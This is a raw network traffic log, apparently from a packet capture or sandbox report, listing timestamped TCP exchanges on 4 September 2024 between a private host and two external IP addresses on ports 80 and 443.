Sep 4, 2024 17:37:10.153825998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153870106 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.160916090 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.160937071 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.161010981 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.161021948 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.161061049 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.161087990 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.161103010 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.161130905 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.161138058 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.161154985 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.161171913 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.161565065 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.161580086 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.161623001 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.161629915 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.161653996 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.161669970 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.162358999 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.162374020 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.162460089 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.162467003 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.162516117 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.162868977 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.162885904 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.162921906 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.162926912 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.162951946 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.162966013 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.164248943 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.164264917 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.164319992 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.164326906 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.164344072 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.164371014 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.164947987 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.164964914 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.165019989 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.165025949 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.165047884 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.165055990 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.165448904 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.165462971 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.165519953 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.165527105 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.165568113 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.189287901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189304113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189315081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189326048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189337015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189347982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189358950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189364910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189371109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189405918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189424038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189425945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189446926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189457893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189464092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189467907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189480066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189483881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189490080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189497948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189502001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189512968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189523935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189523935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189538002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189564943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189584970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189594984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189618111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189624071 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189627886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189640045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189650059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189654112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189661026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189671993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189678907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189682007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189696074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189704895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189706087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189718008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189728022 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189742088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189769030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189918041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189929008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189938068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.189956903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.189970016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190030098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190041065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190051079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190063000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190073967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190074921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190082073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190085888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190098047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190108061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190110922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190120935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190131903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190141916 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190160990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190166950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190170050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190196991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190207958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190308094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190320015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190330029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190340042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190346003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190351963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190362930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190370083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190372944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190386057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190396070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190401077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190408945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190418959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190418959 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190431118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190447092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190469980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190625906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190639019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190649986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190659046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190665007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190677881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190687895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190689087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190699100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190711021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190716028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190725088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190727949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190753937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190778971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190778971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190815926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190826893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190838099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190849066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190861940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190864086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190874100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190875053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.190897942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.190921068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191015005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191035032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191047907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191057920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191057920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191070080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191081047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191092014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191092968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191104889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191113949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191114902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191128969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191138029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191139936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191157103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191184998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191310883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191327095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191338062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191349983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191353083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191364050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191382885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191469908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191482067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191492081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191503048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191509008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191513062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191529036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191531897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191555977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191556931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191571951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191576958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191584110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191595078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191596031 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191605091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191613913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191617012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191629887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191632032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191643000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191653967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191654921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191665888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191670895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191678047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191689968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191696882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191700935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191713095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191718102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191724062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191735029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191735983 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191749096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.191750050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191770077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.191792965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.192065954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192079067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192111015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.192197084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192209005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192219019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192234039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192240000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.192248106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192250967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.192260981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192272902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192280054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.192284107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192286968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.192295074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192300081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.192306995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.192328930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.192347050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227229118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227289915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227300882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227303028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227313995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227329016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227329969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227338076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227341890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227353096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227358103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227365971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227386951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227456093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227466106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227479935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227489948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227499962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227504015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227515936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227529049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227540016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227565050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227569103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227581024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227612019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227641106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227652073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227663040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227674007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227685928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227701902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227767944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227781057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227790117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.227807999 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.227838039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.236071110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.236082077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.236090899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.236119986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.236121893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.236143112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.236155033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.236162901 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.236169100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.236179113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.236190081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.236203909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.236218929 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.238944054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239006042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239042044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239053011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239087105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239090919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239100933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239110947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239123106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239128113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239135027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239151955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239171982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239197016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239212036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239234924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239259958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239274025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239284992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239295006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239305019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239315987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239319086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239348888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239360094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239454985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239499092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239546061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239556074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239587069 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239645958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239656925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239665985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239695072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239707947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239763021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239806890 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.239909887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239921093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.239953995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240006924 CEST	80	49717	147.45.44.104	192.168.2.6
